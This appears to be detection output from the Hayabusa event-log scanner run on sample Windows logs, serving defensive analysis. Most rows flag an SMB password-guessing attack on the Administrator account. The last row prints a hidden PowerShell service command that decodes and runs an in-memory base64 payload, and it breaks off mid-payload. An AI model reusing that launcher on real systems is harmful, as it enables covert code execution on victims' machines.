+2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1CWIqoV6GzmmlRm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiBfvnfTcIG4xJoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dED7HYntoE5D7XvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pX1ztnCKiePrPbTT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3XQcfMHJDsBtJDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhRsRIS5tHKLv2oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmkLhptugDU2fDWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2yk62yREbgDCj9pB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6JPvkmaAsJlwn9t3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lhciP1zM9njlRI3j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: duNDenwdo1oHVuoL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0ChBZOYkTm1SguA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RU38tuiKC0weexmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jg0Hp4xtz0pAMhCz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AorVNz5MgTeEvn2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oJ6tVjBxlYyj5ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oEAEOi0TsSRVPlz4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: USfEwKkH8OUADVds  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y0jg1i6tDiInd10i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv2jRzrgoP6lJdAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LmuAXUwSkhR3tSRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zy4Fkpvcrlmp9AES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 51ipUXvrRh0CPH1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TB15XKzVJwIyjqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i1F6muFPBlPyHPbR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XNXwYS73RElHozUo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ft1MLPJISeq0bMsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8kbFOwQiCyRVMDV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ToPzuDEmXN1fjIcS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pKF1QKEuTXIGnrx2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fyHpo6pX8TEo6ttv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uYqEt90yr8B3rK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LKkrM0slVn0CKHw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyJ82cfaddnc8c6D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KJRw0S82SupmuS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4lSo9BMWdcPLfLb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XreSLg472qhJw0R3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIJcQJKLmnjrE2T9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlddo3GCTEIkFyi9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hxiZoB5mHR2tGUFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fpEbpiox2Q3Qf8av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ